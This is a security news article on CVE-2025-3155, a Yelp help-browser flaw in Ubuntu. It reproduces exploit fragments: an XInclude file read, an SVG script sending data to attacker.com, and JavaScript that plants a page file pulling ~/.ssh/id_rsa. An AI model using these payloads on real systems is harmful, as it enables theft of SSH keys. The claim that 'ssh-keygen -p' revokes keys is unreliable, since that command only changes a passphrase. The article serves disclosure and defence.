Cyber Security News

PoC Exploit Reveals SSH Key Exposure via Yelp Vulnerability on Ubuntu

Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.

The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.

Technical Breakdown of CVE-2025-3155

Affected Systems:

  • Ubuntu 22.04 LTS and earlier desktop editions
  • Yelp versions ≤ 42.1
  • GNOME WebKitGTK components

Vulnerability Chain:

  1. URI Scheme Handling: Yelp registers as the default handler for ghelp:// URIs
  2. XInclude Exploitation: Mallard documentation format allows arbitrary file inclusion via:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
  1. SVG Script Injection: XSLT processing permits script execution through SVG tags:
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>

Attack Scenario Walkthrough

  1. Attacker hosts malicious webpage with automatic download of crafted .page file
  2. Victim visits page triggering download to ~/Downloads folder
  3. Browser redirect triggers ghelp:///proc/self/cwd/Downloads URI
  4. Yelp processes malicious XML with:
    • File inclusion of ~/.ssh/id_rsa
    • Embedded SVG script exfiltrating data via HTTP POST

Key Exploit Code Snippet:

<script>

let payloadPage = `<?xml...>

  <include href="/proc/self/cwd/.ssh/id_rsa"/>

  <svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;

function exp() {

  const blob = new Blob([payloadPage], {type: 'text/plain'});

  const a = document.createElement('a');

  a.href = URL.createObjectURL(blob);

  a.download = 'index.page';

  a.click();

  location = 'ghelp:///proc/self/cwd/Downloads';

}

</script>

Mitigation and Response

  1. Update systems with:
    sudo apt update && sudo apt upgrade yelp
  2. Revoke SSH keys with:
    ssh-keygen -p -f ~/.ssh/id_rsa
  3. Avoid opening unexpected documentation files

Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.

This vulnerability demonstrates three critical risks:

  1. Privilege Escalation: From basic document viewing to system file access
  2. Persistence Risk: Stolen SSH keys enable lateral network movement
  3. Phishing Vector: Requires minimal user interaction (single click)

Security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”

Ongoing investigations continue to determine if this vulnerability was exploited in wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

8 hours ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

8 hours ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

8 hours ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

8 hours ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

12 hours ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

13 hours ago